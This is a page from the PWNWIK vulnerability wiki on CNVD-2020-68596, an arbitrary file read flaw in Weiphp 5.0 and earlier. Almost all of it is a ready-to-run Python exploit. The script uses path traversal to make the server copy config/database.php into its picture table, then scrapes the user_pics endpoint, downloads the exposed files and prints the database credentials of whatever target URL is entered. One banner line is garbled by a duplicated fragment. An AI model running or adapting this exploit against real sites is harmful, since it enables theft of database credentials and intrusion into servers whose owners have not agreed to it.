Loading
0

CNVD-2020-68596 Weiphp5.0 前台文件任意读取漏洞/he

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

השפעת פגיעות

Weiphp <= 5.0

POC

#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from   : http://wiki.peiqi.tech


import requests
import random
import re


def title():
    print('+------------------------------------------')
    print('+  \03334mPOC_Des: http://wiki.peiqi.tech                                   \0330m')
    print('+  \03334mGithub : https://github.com/PeiQi0                                 \0330m')
    print('+  \03334m公众号 : PeiQi文库                                                \0330m')                            \0330m')
    print('+  \03334mVersion: Weiphp5.0                                                \0330m')
    print('+  \03336m使用格式: python3 poc.py                                            \0330m')
    print('+  \03336mUrl    >>> http://xxx.xxx.xxx.xxx                                 \0330m')
    print('+------------------------------------------')

def POC_1(target_url):
    upload_url = target_url + "/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }
    data = {
        "1":1
    }
    try:
        response = requests.post(url=upload_url, headers=headers, data=data, timeout=20)
        if response.status_code == 200:
            print("\03332mo 成功将 database.php文件 写入Pictrue表中\0330m")
        else:
            print("\03331mx 漏洞利用失败 \0330m")
    except:
        print("\03331mx 漏洞利用失败 \0330m")

def POC_2(target_url):
    vnln_url = target_url + "/public/index.php/home/file/user_pics"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
    }
    try:
        response = requests.get(url=vnln_url, headers=headers).text
        href = re.findall(r'<img src="(.*?)"', response)
        for i in href:
            print("\03332mo 得到敏感文件url:{}\0330m".format(i))
            data = requests.get(url=i, headers=headers)
            path = str(random.randint(1,999)) + '.php'
            with open(path, 'wb') as f:
                f.write(data.content)
                print("\03332mo 成功下载文件为:{}\0330m".format(path))
                print("\03332mo 文件内容为:\n\0330m{}".format(data.text))
    except:
            print("\03331mx 获取文件名失败 \0330m")



if __name__ == '__main__':
    title()
    target_url = str(input("\03335mPlease input Attack Url\nUrl >>> \0330m"))
    POC_1(target_url)
    image_url = POC_2(target_url)

PWNWIK.COM